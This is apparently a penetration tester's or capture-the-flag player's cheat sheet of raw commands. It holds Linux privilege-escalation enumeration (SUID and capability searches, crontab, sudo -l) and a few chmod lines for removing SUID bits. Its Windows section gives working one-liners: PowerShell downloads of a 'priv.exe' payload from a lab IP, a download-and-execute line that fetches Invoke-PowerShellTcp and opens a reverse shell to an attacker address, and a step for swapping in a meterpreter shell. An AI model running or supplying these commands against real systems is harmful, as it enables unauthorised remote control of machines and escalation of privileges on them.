find / -perm -4000 2> /dev/null
find / -perm -u=s -type f 2>/dev/null
find / -group adm -readable 2>/dev/null
apt list --upgradeable
getcap -r / 2>/dev/null
cat /etc/crontab
sudo netstat -tulpn | grep LISTEN
sudo -l
chmod u-s == SUID PATCH
chmod g-s filename //SGID PATH
------------------------------------


wget via powershell == powershell -c "Invoke-WebRequest -Uri 'http://10.11.53.74/priv.exe' -outfile 'priv.exe'"

-------------------------------------

Invoke-powershelltcp 

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

------------------------------------

meterpreter shell change  

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.53.74/priv.exe','priv.exe')"
